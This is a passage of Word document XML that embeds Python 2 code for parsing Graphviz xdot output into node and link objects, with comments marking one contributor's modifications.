    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                start = i.index("P 4 ") + 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                end = i[start:].index("\"") + start</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points = i[start:end]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                points.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                points = points.split(" ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                width = string.atof(points[0]) - string.atof(points[2])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                height = string.atof(points[3]) - string.atof(points[5])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                point_x = string.atof(points[2])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                point_y = self.transform(string.atof(points[3]), pagesize[1])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                # this point is the left-top point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                point = [point_x, point_y]</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End of modification</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node = Node(point[0], point[1], width, height)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                node.setText(label)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                node.setHint(label)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                nodeList.append(node)</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ab/>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>i = j</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elif i != '':</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                i = i.replace("\\", "")</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Modified code segment by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Parsing did not work well so I had to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># modify code in order to work well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Modified units are mostly parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                color = i[i.index("color=")+6:i.index("pos")-2]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                path = i[i.index("pos=\"e,")+7:i.index("\"")]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                path = path.replace(",", " ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                path = path.split(" ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                path = path[2:]</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for j in range(0, len(path)):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if j % 2 == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        path[j] = self.transform(string.atof(path[j]), pagesize[1])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        path[j] = string.atof(path[j])</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arrow = i[i.rindex("P 3 ")+4: i.rindex(" \"")]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                arrow = arrow.split(" ")</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End of modification</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for j in range(0, len(arrow)):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    if j % 2 ==1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        arrow[j] = self.transform(string.atof(arrow[j]), pagesize[1])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        arrow[j] = string.atof(arrow[j])</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link = Link()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                link.setColor(color)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                link.drawLine(path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                link.drawArrow(arrow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                linkList.append(link)</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return [pagesize, nodeList, linkList]</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def parsecall(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        pagesize = [0, 0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        nodeList = []</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        linkList = []</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Modified code segment by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Parsing did not work well so I had to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># modify code in order to work well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Modified units are mostly parameters.</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start = self.xdot.index("bb=\"0,0,")+9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        end = self.xdot[start:].index("\"") + start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        [pagesize[0], pagesize[1]] = self.xdot[start:end].split(",")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if pagesize == ['0', '0']:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            return  [[0, 0], nodeList, linkList]</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End of modification</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 turn the String type to the Float type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        [pagesize[0], pagesize[1]] = [string.atof(pagesize[0]), string.atof(pagesize[1])]</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 In parseStr, we can get all information about each node and link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        parseStr = self.xdot[self.xdot[end:].index("];")+ end + 2 : len(self.xdot)-2]</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parseStr = parseStr.replace("\t", "")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        parseStr = parseStr.replace("\r\n", "")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        parseStr = parseStr.replace("\\l", "\n")</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parselist = parseStr.split("];")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        file = open("parselistcall.txt",'w')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        file.write("%s" % parselist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        file.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        for i in parselist:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            if i.find("-&gt;") == -1 and i != '':</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Modified code segment by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Parsing did not work well so I had to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># modify code in order to work well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Modified units are mostly parameters.</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try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
